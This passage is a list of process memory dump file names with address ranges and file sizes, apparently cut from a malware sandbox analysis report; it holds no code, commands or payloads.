                                    Filesize

                                    4.7MB

                                  • memory/4840-228-0x0000000000770000-0x0000000000C2A000-memory.dmp

                                    Filesize

                                    4.7MB

                                  • memory/4840-304-0x0000000000770000-0x0000000000C2A000-memory.dmp

                                    Filesize

                                    4.7MB

                                  • memory/4884-329-0x0000000000710000-0x0000000000D76000-memory.dmp

                                    Filesize

                                    6.4MB

                                  • memory/4884-331-0x0000000000710000-0x0000000000D76000-memory.dmp

                                    Filesize

                                    6.4MB

                                  • memory/4996-131-0x000000001BFA0000-0x000000001CB06000-memory.dmp

                                    Filesize

                                    11.4MB

                                  • memory/4996-130-0x0000000000280000-0x0000000001194000-memory.dmp

                                    Filesize

                                    15.1MB

                                  • memory/5240-845-0x0000000000B80000-0x0000000001021000-memory.dmp

                                    Filesize

                                    4.6MB